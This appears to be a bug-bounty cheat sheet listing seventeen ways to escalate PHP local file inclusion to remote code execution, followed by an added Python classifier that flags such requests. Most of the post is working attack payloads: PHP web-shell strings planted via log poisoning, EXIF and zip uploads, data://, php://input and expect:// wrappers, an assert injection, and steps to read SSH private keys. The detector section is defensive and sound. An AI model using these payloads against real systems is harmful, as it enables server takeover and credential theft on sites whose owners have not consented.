Important cheat sheet for converting LFI to RCE
(1)
Apache Log Poisoning
GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
.
(2)
SSH Log Poisoning
ssh '<?php system($_GET["c"])?>'@target.com
/show.php?file=/var/log/auth.log&c=ls
.
(3)
SMTP Log Poisoning
telnet target(.)com 25
MAIL FROM:<tuhinbose70@gmail.com>
RCPT TO:<?php system($_GET['c'])?>
/show.php?file=/var/log/mail.log&c=ls
.
(4)
Image Upload
i. Add this to EXIF data of s.png: <?php system($_GET['c'])?>
ii. Upload the s.png.
iii. /show.php?file=../img/s.png&c=ls
.
(5)
/proc/self/environ
GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
If no success then try writing files.
.
(6)
php://filter
Read the source code; it may contain sensitive data (usernames/passwords, private keys, etc.) that leads to RCE.
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php
"php://filter" is case insensitive. Try URL encoding or double encoding.
.
(7)
Zip Upload
echo '<?php system($_GET["c"])?>' > shell.php
zip shell.zip shell.php
mv shell.zip shell.jpg
rm shell.php
/show.php?file=zip://shell.jpg%23shell.php
.
(8)
data://text/plain:
/show.php?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php"))?>
/show.php?file=data://text/plain,<?php phpinfo()?>
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=
.
(9)
/proc/self/fd/{id}
Include the shell in headers (User-Agent, Authorization, Referer, etc.) and access /proc/self/fd/{id}
.
(10)
/proc/$PID/fd/$FD
i. Upload a lot of shells.
ii. /show.php?file=/proc/$PID/fd/$FD
.
(11)
expect://
/show.php?page=expect://ls
.
(12)
php://input
POST /index.php?page=php://input HTTP/1.1
<?php system('ls')?>
.
(13)
RCE via vulnerable assert statement
Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");
Payload: ' and die(system("whoami")) or '
.
(14)
Log files:
/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log
Insert the payload via headers (User-Agent, Authorization, Referer, etc.)
.
(15)
Via PHP sessions: from-lfi-to-rce-via-php-sessions
.
(16)
via SSH:
If ssh is active check which user is being used (/proc/self/status & /etc/passwd) and try to access <HOME>/.ssh/id_rsa
.
(17)
vsftpd Log Poisoning:
Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log
.
To automate, use LFISuite.
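A defender-side complement to the list above, added here and not part of the original post: a small Python classifier that flags the include-parameter payloads (stream wrappers, traversal, /proc and log paths) and the header-borne PHP tags that these techniques leave in web server logs or a WAF feed, decoding twice so the double-encoded variants mentioned under php://filter are caught too. The parameter names, rules and sample requests are constructed assumptions, not captured traffic.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Signatures of the LFI-to-RCE techniques above (constructed defender-side rules, not from the post).
WRAPPER_RE = re.compile(r"^\s*(php|data|zip|phar|expect|glob)://", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
SENSITIVE_RE = re.compile(r"/proc/(self|\d+)/|/var/log/|/etc/passwd|\.ssh/|/sess_", re.IGNORECASE)
PHP_TAG_RE = re.compile(r"<\?(?!xml\b)")          # <?php, <?= and short tags, but not <?xml
FILE_PARAMS = ("file", "page", "include", "path", "template")  # assumed include-parameter names

def normalize(value: str) -> str:
    """Decode twice so single- and double-URL-encoded payloads hit the same rules."""
    return unquote(unquote(value))

def classify_request(method: str, target: str, headers: dict) -> list:
    """Return a list of findings for one request; an empty list means nothing suspicious."""
    findings = []
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name in FILE_PARAMS:
        for raw in query.get(name, []):
            value = normalize(raw)
            if WRAPPER_RE.search(value):
                findings.append(f"stream wrapper in {name}")
            if TRAVERSAL_RE.search(value):
                findings.append(f"path traversal in {name}")
            if SENSITIVE_RE.search(value):
                findings.append(f"sensitive path in {name}")
    # A PHP open tag in a request header is the tell-tale of log poisoning (items 1, 9, 14).
    for header, value in headers.items():
        if PHP_TAG_RE.search(normalize(value)):
            findings.append(f"php tag in header {header}")
    return findings

# Constructed sample requests modelled on the cheat sheet; not captured traffic.
SAMPLE_REQUESTS = [
    ("GET", "/show.php?file=about.php", {"User-Agent": "Mozilla/5.0"}),
    ("GET", "/show.php?file=/var/log/apache2/access.log&c=ls",
     {"User-Agent": "<?php system($_GET['c'])?>"}),
    ("GET", "/show.php?file=%2570hp%253a%252f%252ffilter/convert.base64-encode/resource=index.php", {}),
    ("GET", "/show.php?file=../../proc/self/environ&c=ls", {"User-Agent": "curl/8.0"}),
    ("GET", "/show.php?page=expect://ls", {"Referer": "<?xml version='1.0'?>"}),
]

if __name__ == "__main__":
    for method, target, headers in SAMPLE_REQUESTS:
        print(method, target, "->", classify_request(method, target, headers) or "clean")
```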
#bugbounty #bugbountytips #bugbountytip #infosec #informationsecurity #hacking #fr0z3n_f14m3 #webpentesting #cybersecurity #LFI #RCE
